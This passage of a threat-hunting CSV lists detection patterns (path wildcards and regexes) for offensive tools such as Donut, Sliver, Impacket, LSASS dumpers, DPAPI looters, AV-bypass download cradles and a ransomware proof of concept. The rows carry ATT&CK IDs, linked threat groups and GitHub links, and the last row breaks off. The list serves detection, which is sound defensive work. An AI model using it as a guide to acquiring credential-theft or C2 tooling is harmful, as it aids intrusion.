"*/donut.git",".{0,1000}\/donut\.git","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","6739"
"*/Donut_Linux*",".{0,1000}\/Donut_Linux.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","#linux","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","6740"
"*/Donut_Windows*",".{0,1000}\/Donut_Windows.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","6741"
"*/DonutCS/Donut.cs*",".{0,1000}\/DonutCS\/Donut\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","6742"
"*/donutmodule.c*",".{0,1000}\/donutmodule\.c.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","6743"
"*/donut-packer.py*",".{0,1000}\/donut\-packer\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","6744"
"*/DonutTest/*",".{0,1000}\/DonutTest\/.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","6745"
"*/DotNet/SigFlip*",".{0,1000}\/DotNet\/SigFlip.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","6746"
"*/DoubleDrive.git*",".{0,1000}\/DoubleDrive\.git.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","6747"
"*/DoubleDrive-main.zip*",".{0,1000}\/DoubleDrive\-main\.zip.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","6748"
"*/DoUCMe.git*",".{0,1000}\/DoUCMe\.git.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","1","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","6749"
"*/download/linpeas.sh*",".{0,1000}\/download\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","6752"
"*/download/LsassDumping/*",".{0,1000}\/download\/LsassDumping\/.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","1","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","6753"
"*/download/v*/sliver-client_linux*",".{0,1000}\/download\/v.{0,1000}\/sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","6755"
"*/download/v*/sliver-client_macos*",".{0,1000}\/download\/v.{0,1000}\/sliver\-client_macos.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","6756"
"*/download/v*/sliver-client_macos*",".{0,1000}\/download\/v.{0,1000}\/sliver\-client_macos.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","6757"
"*/download/v1.0/payload.dll*",".{0,1000}\/download\/v1\.0\/payload\.dll.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","6758"
"*/download/v1.1.0/pspy32*",".{0,1000}\/download\/v1\.1\.0\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","6759"
"*/download/v1.1.0/pspy64*",".{0,1000}\/download\/v1\.1\.0\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","6760"
"*/download/v1.2.0/pspy32*",".{0,1000}\/download\/v1\.2\.0\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","6761"
"*/download/v1.2.1/pspy32*",".{0,1000}\/download\/v1\.2\.1\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","6762"
"*/download/v1.2.1/pspy64*",".{0,1000}\/download\/v1\.2\.1\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","6763"
"*/Download:Cradle.js*",".{0,1000}\/Download\:Cradle\.js.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","6764"
"*/Download_Cradles.hta*",".{0,1000}\/Download_Cradles\.hta.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","6765"
"*/Download_Cradles.ps1*",".{0,1000}\/Download_Cradles\.ps1.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","6766"
"*/Download-Cradles.cmd*",".{0,1000}\/Download\-Cradles\.cmd.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","6767"
"*/downloadexec.lua*",".{0,1000}\/downloadexec\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","6768"
"*/Downloads/Keylogger.txt*",".{0,1000}\/Downloads\/Keylogger\.txt.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","6769"
"*/Downloads/keypress.log*",".{0,1000}\/Downloads\/keypress\.log.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","6770"
"*/download-stager.js*",".{0,1000}\/download\-stager\.js.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","10","1461","206","2025-03-25T03:30:16Z","2020-03-09T05:48:58Z","6772"
"*/dpap-brute.nse*",".{0,1000}\/dpap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6773"
"*/Dpapi.ps1*",".{0,1000}\/Dpapi\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","6774"
"*/dpapi.py*",".{0,1000}\/dpapi\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6775"
"*/dpapi_domain_backupkey.py*",".{0,1000}\/dpapi_domain_backupkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6776"
"*/dpapi_masterkey.py*",".{0,1000}\/dpapi_masterkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6777"
"*/DPAPImk2john.py*",".{0,1000}\/DPAPImk2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6778"
"*/dpat.py*",".{0,1000}\/dpat\.py.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","6779"
"*/dpipe.sh*",".{0,1000}\/dpipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","N/A","1","67","29","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z","6780"
"*/dpkg/info/tor.list*",".{0,1000}\/dpkg\/info\/tor\.list.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","6781"
"*/dploot.git*",".{0,1000}\/dploot\.git.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","6782"
"*/DragonCastle.git*",".{0,1000}\/DragonCastle\.git.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","6783"
"*/DragonCastle.pdb*",".{0,1000}\/DragonCastle\.pdb.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","6784"
"*/dragoncastle.py*",".{0,1000}\/dragoncastle\.py.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","6785"
"*/D-RAT.exe*",".{0,1000}\/D\-RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6786"
"*/drda-brute.nse*",".{0,1000}\/drda\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6787"
"*/drda-info.nse*",".{0,1000}\/drda\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6788"
"*/DReverseProxy.git*",".{0,1000}\/DReverseProxy\.git.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","6789"
"*/DriverDump.exe*",".{0,1000}\/DriverDump\.exe.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6790"
"*/Drones/SleepDialogue.razor*",".{0,1000}\/Drones\/SleepDialogue\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6791"
"*/drop-sc.py*",".{0,1000}\/drop\-sc\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6799"
"*/DRSAT.exe*",".{0,1000}\/DRSAT\.exe.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","1","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","6800"
"*/DRSAT.git*",".{0,1000}\/DRSAT\.git.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","1","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","6801"
"*/DRSAT-0.2.zip*",".{0,1000}\/DRSAT\-0\.2\.zip.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","1","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","6802"
"*/drunkpotato*",".{0,1000}\/drunkpotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 